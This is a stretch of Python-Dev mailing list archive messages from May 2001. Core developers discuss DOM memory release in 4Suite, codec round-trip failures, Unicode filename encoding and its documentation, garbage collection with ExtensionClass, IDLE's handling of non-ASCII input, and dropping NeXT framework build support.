DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite at lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Sun May 13 20:31:42 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . > It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. > > If their mappings are broken, we can't do much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin at loewis.home.cs.tu-berlin.de Sun May 13 21:08:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? Regards, Martin From tim.one at home.com Sun May 13 21:45:40 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one at home.com Sun May 13 22:54:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: ]/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each. In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely . The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's a x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one at home.com Sun May 13 23:00:32 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip at pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import. Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido at digicool.com Mon May 14 00:26:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. > > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but may be I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:37:44 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking it's nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical quesion, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code! ) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClassess (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:43:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:51:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed? --Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson at fourthought.com Mon May 14 03:02:03 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH at ActiveState.com Mon May 14 03:37:35 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. - Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, altough the default encoding for that platform will be other than > 'mbcs'. > On operating system that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use it's default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one at home.com Mon May 14 04:52:22 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far is it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors. What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encdoing" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this , I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so : once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry at digicool.com Mon May 14 06:16:18 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr at thyrsus.com Mon May 14 07:20:17 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial? Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few tings: 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg at cosc.canterbury.ac.nz Mon May 14 07:36:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. From martin at loewis.home.cs.tu-berlin.de Mon May 14 07:38:24 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal at lemburg.com Mon May 14 11:02:19 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 14 11:15:43 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Mon May 14 11:55:26 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik at pythonware.com Mon May 14 12:18:49 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrance was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis at informatik.hu-berlin.de Mon May 14 13:29:21 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g. it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correct IMO. The question is how IDLE should deal with it. Regards, Martin From loewis at informatik.hu-berlin.de Mon May 14 13:41:26 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH at ActiveState.com Mon May 14 14:20:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry at digicool.com Mon May 14 14:54:59 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True. The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much like as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr at thyrsus.com Mon May 14 17:11:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed." -- Alexander Hamilton, The Federalist Papers at 184-188 From skip at pobox.com Mon May 14 17:54:54 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completed confused now. I extended the definition of ECTypeType to include this after the doc string slot: (traverseproc)0, /* tp_traverse */ (inquiry)0, /* tp_clear */ (richcmpfunc)0, /* rich comparisons */ 0L, /* weak reference enabler */ #ifdef COUNT_ALLOCS /* these must be last */ 0, /* tp_alloc */ 0, /* tp_free */ 0, /* tp_maxalloc */ (struct _typeobject *)0, /* tp_next */ #endif When I looked at the definition of ECType, after the doc string I saw METHOD_CHAIN(ExtensionClass_methods) as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get Fatal Python error: UNREF invalid object when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g at Virginia.EDU Mon May 14 19:04:56 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and headers files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). I don't think it needs to be as 